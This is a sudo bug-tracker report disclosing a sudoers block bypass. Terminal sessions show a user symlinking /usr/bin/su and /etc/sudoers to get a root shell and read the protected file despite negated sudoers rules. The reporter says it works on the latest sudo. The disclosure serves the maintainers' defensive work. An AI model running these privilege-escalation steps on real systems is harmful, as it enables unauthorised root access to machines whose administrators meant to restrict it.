Bugzilla – Bug 1009
Bypass Sudo Editing block on any blocked file
Last modified: 2021-11-21 23:05:38 MST
When you add a user to sudoers file, and attempt to block them from editing specific files you can do this by the following: username ALL=ALL, !/usr/bin/su This will prevent the user from running the sudo su command to get a root shell. I have found that the following exploit will work: 1c44h1wy7i@pd-lpsrtlus498:~$ sudo su Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/su' as root on pd-lpsrtlus498.amberjack.launchpoint. 1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /usr/bin/su su_exploit 1c44h1wy7i@pd-lpsrtlus498:~$ sudo ./su_exploit root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# whoami;id root uid=0(root) gid=0(root) groups=0(root) root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# This works for any file that has been explicitly blacklisted. And can also be used to edit blacklisted files. 1c44h1wy7i@pd-lpsrtlus498:~$ cat /etc/sudoers cat: /etc/sudoers: Permission denied 1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat /etc/sudoers Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/cat /etc/sudoers' as root on pd-lpsrtlus498.amberjack.launchpoint. 1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /etc/sudoers sudoers_exp 1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat sudoers_exp # testing # This file MUST be edited with the 'visudo' command as root. # # Please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file. # # See the man page for details on how to write a sudoers file. # This appears to work on any version of sudo 1.8.x (including the default sudo 1.8.31/32 available on Ubuntu 20) It is patched on Sudo version 1.9.5p2 installed on my Fedora box. (not sure what version patched it)
It isnt fixed in latest. I had a typo in my sudoers file. So it works on any version including latest